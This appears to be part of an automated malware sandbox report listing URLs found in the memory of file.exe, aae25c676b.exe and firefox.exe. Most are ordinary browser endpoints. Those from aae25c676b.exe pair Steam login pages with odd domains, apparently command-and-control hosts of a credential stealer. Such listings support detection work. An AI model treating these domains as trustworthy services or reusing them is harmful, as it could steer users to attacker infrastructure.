Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-recommended-by-learn-more
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856566445.000002EE59000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2878148995.000002EE5D1ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001A.00000003.2808538158.000002EE606E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001A.00000003.2808538158.000002EE606E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001A.00000003.2681144026.000002EE5CB10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856566445.000002EE59000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2941379352.00000C05D3904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001A.00000002.2929744715.000002EE64D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001A.00000003.2787747889.000002EE5EF64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001A.00000003.2769083084.000002EE5D8EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D8D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C4B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%This
Source: firefox.exe, 0000001A.00000002.2883094027.000002EE5D8BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D370000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2769083084.000002EE5D8D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D8D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2900792770.000002EE5EA6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: firefox.exe, 0000001A.00000002.2860117948.000002EE59DAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2862408899.000002EE59F22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sPdfJs.init
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%sget
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%spdfjs.previousHandler.preferredAction
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mobbipenju.store:443/api
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comto-handle-default-browser-agentdevtools-commandkey-storageFound
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2948229640.0000385848BDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000003.2216206889.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/Z
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/m
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 0000001A.00000002.2905856189.000002EE5EF42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C963000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2948229640.0000385848BDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E95F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C9B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
